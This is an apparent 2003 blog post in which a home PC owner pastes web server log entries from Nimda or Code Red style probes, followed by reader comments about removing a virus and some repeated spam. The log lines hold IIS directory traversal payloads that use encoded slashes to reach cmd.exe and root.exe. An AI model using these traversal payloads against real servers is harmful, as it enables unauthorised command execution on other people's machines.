My home PC has been attacked. I figured out that it was either Nimda or Code Red.
cmpt-100.usask.ca - - [28/Mar/2003:13:02:27 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294
cmpt-100.usask.ca - - [28/Mar/2003:13:02:27 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
hi! i wonder if you're still be able to read this. i do hope so :) anyway im encountering the same problems now. cmd.exe window pops up (dozens of them) in random times everytime im online. i figure its a virus but i don't know how to get rid of it, short of reformatting my pc. any idea how i can fix it? thanx :D
Posted by: sarah at April 3, 2004 7:06 AMtorque : you should have nothing to worry about, as they were all 404 (not found) or 400 (error). As for sarah, i storngly reccomend getting and running an anti-virii (if using windows, as it appears, avg is free). best of luck.
Posted by: godsyn at March 6, 2005 11:12 PMGood job!
Posted by: Markus at December 11, 2006 7:19 AMGood job!
Posted by: Markus at December 12, 2006 5:14 PMGood job!
Posted by: Markus at December 12, 2006 11:37 PM